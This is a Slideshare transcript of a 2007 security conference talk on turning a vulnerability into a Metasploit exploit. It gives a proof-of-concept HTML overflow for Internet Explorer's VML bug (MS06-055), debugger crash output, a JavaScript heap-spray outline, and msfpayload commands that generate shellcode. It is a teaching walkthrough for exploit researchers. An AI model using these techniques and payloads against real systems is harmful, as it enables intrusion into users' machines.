Slideshare.net (beta)

Home My Slidespace Upload Community Tags Widgets

Latest | Most Viewed | Most Embedded | Featured | Most Favorited | Most Downloaded | Slidecasts

 
Post: 
Myspace Hi5 Friendster Xanga LiveJournal Facebook Blogger Tagged Typepad Freewebs BlackPlanet gigya icons

All comments

Add a comment on Slide 1

If you have a SlideShare account, login to comment; else you can comment as a guest


Showing 1-50 of 0 (more)

Writing Metasploit Plugins

From amiable_indian, 1 year ago

Writing Metasploit Plugins

4028 views  |  2 comments  |  0 favorites  |  10 embeds (Stats)
Share
Download not available ?
 

Tags

writing metasploit plugins

 
 

Groups / Events

 

 
Embed
options

More Info

This slideshow is Public
Total Views: 4028
on Slideshare: 3761
from embeds: 267

Slideshow transcript

Slide 1: More on Metasploit plugins from vulnerability to exploit Saumil Shah ceo, net-square IT Underground - Prague 2007

Slide 2: # who am i # who am i 16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33 USER TTY FROM LOGIN@ IDLE WHAT saumil console - 11:43 0:05 bash • Saumil Shah - “krafty” ceo, net-square solutions saumil@saumil.net author: “Web Hacking - Attacks and Defense” © Saumil Shah

Slide 3: From Vulnerability to Exploit Fuzzing Debugger Attack Vector EIP = 0x41414141 Reliable EIP return address Final Shellcode Bad characters Test Shellcode Working exploit (INT 3) Shellcode Handling INT 3? © Saumil Shah

Slide 4: The CPU’s registers • The Intel 32-bit x86 registers: EAX ESP accumulator stack pointer EBX EBP base base pointer ECX ESI counter source index EDX EDI data destination index EIP instruction pointer © Saumil Shah

Slide 5: The Process Memory Map .text 0x08000000 .data .bss heap - malloc’ed data … v heap ^ stack … main() local vars argc **argv **envp cmd line arguments environment vars 0xc0000000 © Saumil Shah

Slide 6: Win32 Process Memory Map 0x00000000 error trapping 0x00010000 program image heap stack 0x40000000 DLLs DLLs DLLs 0x7FFDE000 First TEB 0x7FFDF000 PEB 0x7FFE0000 Shared user page 0x7FFE1000 No access 0x7FFFFFFF © Saumil Shah

Slide 7: Exploit example - IE VML overflow • Buffer overflow in IE’s VML implementation • MS06-055 • <v:fillmethod=“AAAAAAAA…”> • Exploiting IE 6 on XP SP2 • Triggering the exploit by overwriting SEH © Saumil Shah

Slide 8: Windows SEH • SEH - Structured Exception Handler • Windows pops up a dialog box: • Default handler kicking in. © Saumil Shah

Slide 9: Exception handling • Try / catch block try { : code that may throw : an exception. } catch { : attempt to recover from : the exception gracefully. } • Pointer to the exception handling code also saved on the stack, for each code block. © Saumil Shah

Slide 10: Exception handling … implementation exception handler code local vars (catch block) saved EBP saved EIP params frame w/ exception handling addr of exception handler more frames Bottom of stack © Saumil Shah

Slide 11: SEH Record • Each SEH record is of 8 bytes ptr to next SEH record address of exception handler • These SEH records are found on the stack. • In sequence with the functions being called, interspersed among function (block) frames. • WinDBG command - !exchain © Saumil Shah

Slide 12: SEH Chain • Each SEH record is of 8 bytes ptr to SEH_record_2 ex_handler1() addr of ex_handler1 ex_handler2() ptr to next SEH_record_n addr of ex_handler2 MSVCRT!exhandler 0xFFFFFFFF default exception handler bottom of stack © Saumil Shah

Slide 13: SEH on the stack ^ stack local vars saved EIP func_z() saved EBP ex_handler_z() params ptr to next SEH record address of exception handler main() MSVCRT!exhandler initial entry frame 0xFFFFFFFF address of exception handler © Saumil Shah

Slide 14: Yet another way of getting EIP • Overwrite one of the addresses of the registered exception handlers… • …and, make the process throw an exception! • If no custom exception handlers are registered, overwrite the default SEH. • Might have to travel way down the stack… • …but in doing so, you get a long buffer! © Saumil Shah

Slide 15: Overwriting SEH buffer ex_handler() saved EIP saved EBP params ptr to next SEH record address of exception handler © Saumil Shah

Slide 16: Overwriting SEH AAAA AAAA AAAA ex_handler() Illegal memory access AAAA AAAA causes segmentation fault. OS invokes registered AAAA exception handler in the chain AAAA AAAA AAAA AAAA EIP = 0x42424242 AAAA ::: © Saumil Shah

Slide 17: ie_vml1 • proof of concept: <head> <object id=\"VMLRender” classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\"> </object> <style>v\\:* { behavior: url(#VMLRender); }</style> </head> <body> <v:rect style='width:120pt;height:80pt' fillcolor=\"red\"> <script> document.write(\"<v:fill method =\\\"\"); for(i = 0; i < 2625; i++) document.write(\"&#x4141&#x4141&#x4141&#x4141\"); document.write(\"\\\">\"); </script> </v:rect></v:fill></body> © Saumil Shah

Slide 18: Setting up the exploit • On your host • Run daemon.pl to serve up ie_vml1.html $ ./daemon.pl ie_vml1.html [*] Starting HTTP server on 8080 • On the Windows box • start up iexplore • start up WinDBG • press F6 in WinDBG and attach to iexplore.exe 0:005> gh © Saumil Shah

Slide 19: Crashing IE • Surf to http://192.168.7.xxx:8080/ (18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0013b4c4 ebx=001df20c ecx=0013b4b8 edx=00004141 esi=0000259e edi=00140000 eip=5deded1e esp=0013b4a0 ebp=0013b6c8 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Common Files\\Microsoft Shared\\VGX\\vgx.dll - vgx!$DllMain$_gdiplus+0x30e8d: 5deded1e 668917 mov [edi],dx ds:0023:00140000=6341 0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141 • The SEH record is overwritten. © Saumil Shah

Slide 20: Crashing IE • Surf to http://192.168.7.xxx:8080/ 0:000> !exchain 0013e420: 41414141 Invalid exception stack at 41414141 0:000> g (18c.584): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000 eip=41414141 esp=0013b0d0 ebp=0013b0f0 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 41414141 ?? ??? © Saumil Shah

Slide 21: EIP = 0x41414141 • We control EIP. • Where do you want to go…? • Direct return to stack? • XP SP2 doesn’t allow it. • Jump through registers? • EDX ESP and EBP are the only possible options…but they don’t point to our buffer. • Other registers are cleared, thanks to XP SP2. • XP SP2 also forbids jumping into DLLs. © Saumil Shah

Slide 22: How do we pull it off? • In other circumstances, we’d have to go through long tedious routes… • …or publish a DoS exploit and call it a day. • L4m3 • We are exploiting a browser • Browsers run Javascript • Javascript has arrays • Javascript arrays occupy heap memory © Saumil Shah

Slide 23: Loading our buffer in the heap • Can we load our shellcode in the heap via Javascript? • How do we know where our buffer lies? • Direct jump into heap? • yes! that is possible. © Saumil Shah

Slide 24: Heap Spraying • Technique pioneered by Skylined • Make a VERY large NOP sled • Append shellcode at its end • Create multiple instances of this NOP sled in the heap memory • using Javascript arrays… a[0] = str; a[1] = str… • The heap gets “sprayed” with our payloads. • Land somewhere in the NOPs, and you win. © Saumil Shah

Slide 25: Heap Spraying a[7] <script> : NOP sled spray = build_large_nopsled(); a = new Array(); shellcode for(i = 0; i < 100; i++) a[8] a[i] = spray + shellcode; NOP sled : </script> shellcode <html> : a[9] exploit trigger condition goes here NOP sled : </html> shellcode © Saumil Shah

Slide 26: Tips on Heap Spraying • Make really large NOP sleds • approx 800,000 bytes per spray block • Adjust the size of the NOP sled to leave very little holes inbetween spray blocks. • Javascript Unicode encoding works great for shellcode. • shellcode = unescape(“%uXXXX%uXXXX…”); • Null bytes are not a problem anymore. © Saumil Shah

Slide 27: ie_vml2 • On your host • Run daemon.pl to serve up ie_vml2.html $ ./daemon.pl ie_vml2.html [*] Starting HTTP server on 8080 • On the Windows box • start up iexplore • start up WinDBG • press F6 in WinDBG and attach to iexplore.exe 0:005> gh © Saumil Shah

Slide 28: Crashing IE again • INT3 shellcode. • Look for “90 90 90 90 cc cc cc cc” in the memory after IE crashes. 0:000> s 02000000 l fffffff 90 90 90 90 cc cc cc cc 02150020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02360020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02570020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02780020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02990020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02ba0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02db0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 02fc0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 031d0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ 033e0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................ : : : © Saumil Shah

Slide 29: Jump to heap • We can point EIP to any of the sprayed blocks. • Arbitrarily choose addresses • 0x03030303 • 0x04040404 • 0x05050505…etc. • ie_vml3.html jumps to 0x05050505 • Got INT 3? © Saumil Shah

Slide 30: Introducing Metasploit • An advanced open-source exploit research and development framework. • http://metasploit.com • Current stable version: 2.7 • Written in Perl, runs on Unix and Win32 (cygwin) • Brand new 3.0 • Complete rewrite in Ruby © Saumil Shah

Slide 31: Introducing Metasploit • Generate shellcode. • Shellcode encoding. • Shellcode handlers. • Scanning binaries for specific instructions: • e.g. POP/POP/RET, JMP ESI, etc. • Ability to add custom exploits, shellcode, encoders. • …and lots more. © Saumil Shah

Slide 32: Enter Shellcode • Code assembled in the CPU’s native instruction set. • Injected as a part of the buffer that is overflowed. • Most typical function of the injected code is to “spawn a shell” - ergo “shellcode”. • A buffer containing shellcode is termed as “payload”. © Saumil Shah

Slide 33: Writing Shellcode • Need to know the CPU’s native instruction set: • e.g. x86 (ia32), x86-64 (ia64), ppc, sparc, etc. • Tight assembly language. • OS specific system calls. • Shellcode libraries and generators. • Metasploit Framework. © Saumil Shah

Slide 34: Injecting the shellcode • Easiest way is to pack it in the buffer overflow data itself. • Place it somewhere in the payload data. • Need to figure out where it will reside in the memory of the target process. © Saumil Shah

Slide 35: A little about shellcode • Types of shellcode: • Bind shell • Exec command • Reverse shell • Staged shell, etc. • Advanced techniques: • Meterpreter • Uploading and running DLLs “in-process” • …etc. © Saumil Shah

Slide 36: Payload Encoders • Payload encoders create encoded shellcode, which meets certain criteria. • e.g. Alpha2 generates resultant shellcode which is only alphanumeric. • Allows us to bypass any protocol parsing mechanisms / byte filters. • An extra “decoder” is added to the beginning of the shellcode. • size may increase. © Saumil Shah

Slide 37: Payload Encoders • Example: Alpha2 encoding original shellcode (ascii 0-255) decoder UnWQ89Jas281EEIIkla2wnhaAS901las • Transforms raw payload into alphanumeric only shellcode. • Decoder decodes the payload “in-memory”. © Saumil Shah

Slide 38: Payload Encoders • Metasploit offers many types of encoders. • Work around protocol parsing • e.g. avoid CR, LF, NULL • toupper(), tolower(), etc. • Defeat IDS • Polymorphic Shellcode • Shikata Ga Nai © Saumil Shah

Slide 39: Using Metasploit to generate shellcode • We need Javascript Unicode encoded shellcode. • We will run “calc.exe” • msfpayload - cmdline shellcode generation. • msfencode - cmdline shellcode encoder. • jsencode.pl - wrapper around Metasploit’s Pex::Utils::JSUnescape() function. © Saumil Shah

Slide 40: Generate calc.exe shellcode • Generate JSencoded shellcode: $ ./msfpayload win32_exec EXITFUNC=“seh” CMD=“calc.exe” R | ./jsencode.pl • Final version ie_vml4.html contains working shellcode. • A slight problem • too many CALCs! © Saumil Shah

Slide 41: Exit function - “thread” vs. “seh” • Exiting via SEH causes the whole thing to repeat itself. • Re-generate the shellcode using EXITFUNC=“thread” $ ./msfpayload win32_exec EXITFUNC=“thread” CMD=“calc.exe” R | ./jsencode.pl © Saumil Shah

Slide 42: Writing Metasploit exploit modules • Integration within the Metasploit framework. • Multiple target support. • Dynamic payload selection. • Dynamic payload encoding. • Built-in payload handlers. • Can use advanced payloads. • …a highly portable, flexible and rugged exploit! © Saumil Shah

Slide 43: How Metasploit runs an exploit user supplied List of known Metasploit exploit info target values Shellcode Library EXPLOIT preamble Encoders create payload launch attack get connection Payload handlers © Saumil Shah

Slide 44: Writing a Metasploit exploit • Perl module (2.6), Ruby module (3.0) • Pre-existing data structures • %info, %advanced • Constructor • sub new {…} • Exploit code • sub Exploit {…} © Saumil Shah

Slide 45: Structure of the exploit perl module package Msf::Exploit::name; use base “Msf::Exploit”; use strict; use Pex::Text; my $advanced = { }; information block my $info = { }; sub new { constructor return an instance of our exploit } sub Exploit { exploit block } © Saumil Shah

Slide 46: %info • • Name Payload • • Version Encoder • • Authors Refs • • Arch DefaultTarget • • OS Targets • • Priv Keys • UserOpts © Saumil Shah

Slide 47: Metasploit Pex • Perl EXtensions. <metasploit_home>/lib/Pex.pm <metasploit_home>/lib/Pex/ • Text processing routines. • Socket management routines. • Protocol specific routines. • These and more are available for us to use in our exploit code. © Saumil Shah

Slide 48: Pex::Text • Encoding and Decoding (e.g. Base64) • Pattern Generation • Random text generation (to defeat IDS) • Padding • …etc © Saumil Shah

Slide 49: Pex::Socket • TCP • UDP • SSL TCP • Raw UDP © Saumil Shah

Slide 50: Pex - protocol specific utilities • SMB • DCE RPC • SunRPC • MSSQL • …etc © Saumil Shah

Slide 51: Pex - miscellaneous utilities • Pex::Utils • Array and hash manipulation • Bit rotates • Read and write files • Format String generator • Create Win32 PE files • Create Javascript arrays • …a whole lot of miscellany! © Saumil Shah

Slide 52: metasploit_skel.pm • A skeleton exploit module. • Walk-through. • Can use this skeleton to code up exploit modules. • Place finished exploit modules in: <path_to_metasploit>/exploits/ © Saumil Shah

Slide 53: Finished examples • my_ie_vml.pm © Saumil Shah

Slide 54: Some command line Metasploit tools • msfcli • Metasploit command line interface. • Can script up metasploit framework actions in a non-interactive manner. • msfpayload • Generate payload with specific options. • msfencode • Encode generated payload. © Saumil Shah

Slide 55: More command line Metasploit tools • msfweb • Web interface to the Metasploit framework. • msfupdate • Live update for the Metasploit framework. © Saumil Shah

Slide 56: New in Version 3.0 • msfd • Metasploit daemon, allows for client-server operation of Metasploit. • msfopcode • command line interface to Metasploit’s online opcode database. • msfwx • a GUI interface using wxruby. © Saumil Shah

Slide 57: New in Version 3.0 • New payloads, new encoders. • Ruby extension - Rex (similar to Pex) • NASM shell. • Back end Database support. • …whole lot of goodies here and there. © Saumil Shah

Slide 58: Thank You! Saumil Shah saumil@saumil.net http://net-square.com +91 98254 31192

© 2008 SlideShare Inc. All Rights Reserved.
App06 is serving you.